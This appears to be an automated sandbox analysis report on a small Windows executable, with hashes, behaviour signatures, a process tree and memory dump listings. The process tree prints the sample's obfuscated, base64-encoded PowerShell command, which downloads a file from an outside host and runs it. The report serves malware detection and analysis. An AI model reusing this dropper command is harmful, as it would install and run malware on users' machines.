Overview

overview

10

Static

static

3

2DFGVCXV.exe

windows7-x64

8

2DFGVCXV.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    08-12-2023 02:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2DFGVCXV.exe

  • Size

    5KB

  • MD5

    35beb6bfc19b4f3f1a0163f52870394a

  • SHA1

    211362d1784343a46988ca4eae79bb6d99d68d0b

  • SHA256

    e593bbbea1e480fdd8018bdaf481ef9f76f6b7c8cf783603164633bb0f8b2979

  • SHA512

    bd4dc84de924069bf0adc12136badba67c89af49bbe1692631f25c674bce0f2e33c49820f72da019b0a28fe5ab646a438371458ddfe3ddde722b7438f0c86b77

  • SSDEEP

    96:Ende79bSCbn4KLZDe5RuNDZPgDtENtUqwUNGOuKGd3ojfrl:WO9bZbn4KLZD+0NDZcSNtUqwUgiGdS

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe
    "C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdgBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcALgBnAHUAaQBsAGQAZQBkAGMAZABuAC4AYwBvAG0ALwBDAG8AbgB0AGUAbgB0AE0AZQBkAGkAYQBHAGUAbgBlAHIAaQBjAEYAaQBsAGUAcwAvADEAYQAzADAAZAA5ADkAMwA0ADMAZgA0ADgANQBlADIAMAAxADkAYwA4AGQANQBiADUAMwA1ADgAZgBhAGIAOAAtAEYAdQBsAGwALgB6AGkAcAAnACwAIAA8ACMAbAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGIAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHkAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEQARgBHAEQARgBFAFcALgBlAHgAZQAnACkAKQA8ACMAeQB6AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAbgB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIARABGAEcARABGAEUAVwAuAGUAeABlACcAKQA8ACMAeABzAGUAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2876-0-0x00000000001C0000-0x00000000001C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2876-1-0x000007FEF5150000-0x000007FEF5B3C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2876-2-0x000007FEF5150000-0x000007FEF5B3C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2928-7-0x000000001B380000-0x000000001B662000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2928-8-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-10-0x0000000002310000-0x0000000002318000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2928-9-0x0000000002260000-0x00000000022E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2928-11-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-12-0x0000000002260000-0x00000000022E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2928-13-0x0000000002260000-0x00000000022E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2928-14-0x0000000002260000-0x00000000022E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2928-15-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-16-0x0000000002260000-0x00000000022E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2928-17-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

    Filesize

    9.6MB

    Download